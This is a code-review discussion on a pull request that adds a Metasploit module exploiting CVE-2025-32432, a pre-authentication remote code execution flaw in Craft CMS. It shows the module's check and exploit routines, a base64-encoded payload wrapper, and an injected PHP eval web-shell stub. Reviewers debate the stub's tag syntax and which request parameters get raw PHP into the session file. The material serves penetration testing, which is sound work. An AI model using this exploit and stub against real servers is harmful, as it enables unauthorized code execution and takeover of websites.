modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb

```diff
@@ -0,0 +1,225 @@
+
+          Discovered in the wild by Orange Cyberdefense CSIRT and assigned CVE-2025-32432.
+        },
+        'Author' => [
+          'Nicolas Bourras (Orange Cyberdefense)', # Research + PoC
+          'Valentin Lobstein'                      # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'CVE', '2025-32432' ],
+          [ 'URL', 'https://sensepost.com/blog/2025/investigating-an-in-the-wild-campaign-using-rce-in-craftcms/' ],
+          [ 'URL', 'https://blog.onyphe.io/en/cve-2025-32432-0day-craft-cms-discovered-by-orange-cyberdefense/' ]
+        ],
+        'Platform' => %w[php unix linux],
+        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Targets' => [
+          [
+            'PHP In-Memory',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+            }
+          ],
+          [
+            'Unix/Linux Command Shell',
+            {
+              'Platform' => %(unix linux),
+              'Arch' => ARCH_CMD
+            }
+          ],
+        ],
+        'Privileged' => false,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        },
+        'DisclosureDate' => '2025-04-14',
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'Base path', '/' ]),
+        OptInt.new('ASSET_ID', [true, 'Existing asset ID', Rex::Text.rand_text_numeric(2..3)])
+      ]
+    )
+  end
+
+  def check
+    csrf_token = fetch_cookies_and_csrf
+    return CheckCode::Unknown('Could not retrieve cookies & CSRF') if csrf_token.nil?
+
+    vprint_status "Using CSRF token: #{csrf_token}"
+
+    response = send_transform(csrf_token, datastore['ASSET_ID'], 'phpinfo')
+    return CheckCode::Unknown('No response from generate-transform') if response.nil?
+
+    if response.body.include?('If you did not receive a copy of the PHP license')
+      CheckCode::Vulnerable('License text detected')
+    else
+      CheckCode::Safe('License text not detected')
+    end
+  end
+
+  def php_exec_cmd(encoded_payload)
+    generator = Rex::RandomIdentifier::Generator.new
+    disabled_var = "$#{generator[:dis]}"
+    payload_b64 = Rex::Text.encode_base64(encoded_payload)
+
+    <<~PHP
+      #{php_preamble(disabled_varname: disabled_var)}
+      $c = base64_decode("#{payload_b64}");
+      #{php_system_block(cmd_varname: '$c', disabled_varname: disabled_var)}
+    PHP
+  end
+
+  def exploit
+    payload_code = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
+    encoded_payload = framework.encoders
+                               .create('php/base64')
+                               .encode(payload_code)
+
+    random_param = Rex::Text.rand_text_alphanumeric(5..12)
+    initial_payload = "<?=eval($_GET['#{random_param}']);die()?>"
```

Comment:
```suggestion
    initial_payload = "<?php eval($_GET['#{random_param}']);die();"
```

[Short tags can be disabled](https://www.php.net/manual/en/language.basic-syntax.phptags.php), and there is no need to close the php tags after the last instruction.

Reply:
You might want to switch to `POST`, as `GET`'s content is usually logged.

Reply:
Thanks

Reply:
Tried multiple ways to inject the PHP stub without using the `<?=` short tag, but none worked without causing a 400 Bad Request or PHP ignoring the code.

Test results:
```bash
echo "<?php print_r(10);" > test.php
php test.php
10   # OK

echo "<?php/**/print_r(10);" > test.php
php test.php
<?php/**/print_r(10);   # Not executed

echo "<?php;print_r(10);" > test.php
php test.php
<?php;print_r(10);   # Not executed

echo "<?php@print_r(10);" > test.php
php test.php
<?php@print_r(10);   # Not executed
```

Sending a GET request with `<?php ... ?>` as a parameter results in:

```
HTTP/1.1 400 Bad Request
```

Encoding the payload is not an option because the session file must contain raw PHP, not encoded characters.

Using the `<?=` short tag is the only reliable way to inject executable code without breaking the request or the PHP parser.

Also attempted to inject the stub via POST by embedding it inside the final JSON payload, but the data is not processed into the session, making this approach ineffective. Only GET parameters are usable, which heavily restricts the options.